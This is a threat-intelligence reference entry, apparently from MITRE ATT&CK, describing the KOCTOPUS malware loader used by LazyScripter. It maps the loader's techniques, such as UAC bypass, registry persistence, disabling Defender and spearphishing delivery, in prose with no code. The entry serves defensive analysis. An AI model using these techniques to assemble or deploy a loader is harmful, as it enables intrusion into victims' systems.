Skip to content

S0669 KOCTOPUS

KOCTOPUS‘s batch variant is loader used by LazyScripter since 2018 to launch Octopus and Koadic and, in some cases, QuasarRAT. KOCTOPUS also has a VBA variant that has the same functionality as the batch version.1

Item Value
ID S0669
Associated Names
Type MALWARE
Version 1.2
Created 06 December 2021
Last Modified 22 March 2023
Navigation Layer View In ATT&CK® Navigator

Techniques Used

Domain ID Name Use
enterprise T1548 Abuse Elevation Control Mechanism -
enterprise T1548.002 Bypass User Account Control KOCTOPUS will perform UAC bypass either through fodhelper.exe or eventvwr.exe.1
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder KOCTOPUS can set the AutoRun Registry key with a PowerShell command.1
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell KOCTOPUS has used PowerShell commands to download additional files.1
enterprise T1059.003 Windows Command Shell KOCTOPUS has used cmd.exe and batch files for execution.1
enterprise T1059.005 Visual Basic KOCTOPUS has used VBScript to call wscript to execute a PowerShell command.1
enterprise T1140 Deobfuscate/Decode Files or Information KOCTOPUS has deobfuscated itself before executing its commands.1
enterprise T1564 Hide Artifacts -
enterprise T1564.003 Hidden Window KOCTOPUS has used -WindowsStyle Hidden to hide the command window.1
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.1
enterprise T1070 Indicator Removal -
enterprise T1070.009 Clear Persistence KOCTOPUS can delete created registry keys used for persistence as part of its cleanup procedure.1
enterprise T1105 Ingress Tool Transfer KOCTOPUS has executed a PowerShell command to download a file to the system.1
enterprise T1036 Masquerading -
enterprise T1036.005 Match Legitimate Name or Location KOCTOPUS has been disguised as legitimate software programs associated with the travel and airline industries.1
enterprise T1112 Modify Registry KOCTOPUS has added and deleted keys from the Registry.1
enterprise T1106 Native API KOCTOPUS can use the LoadResource and CreateProcessW APIs for execution.1
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.010 Command Obfuscation KOCTOPUS has obfuscated scripts with the BatchEncryption tool.1
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment KOCTOPUS has been distributed via spearphishing emails with malicious attachments.1
enterprise T1566.002 Spearphishing Link KOCTOPUS has been distributed as a malicious link within an email.1
enterprise T1090 Proxy KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.1
enterprise T1082 System Information Discovery KOCTOPUS has checked the OS version using wmic.exe and the find command.1
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link KOCTOPUS has relied on victims clicking on a malicious link delivered via email.1
enterprise T1204.002 Malicious File KOCTOPUS has relied on victims clicking a malicious document for execution.1

Groups That Use This Software

ID Name References
G0140 LazyScripter 1

References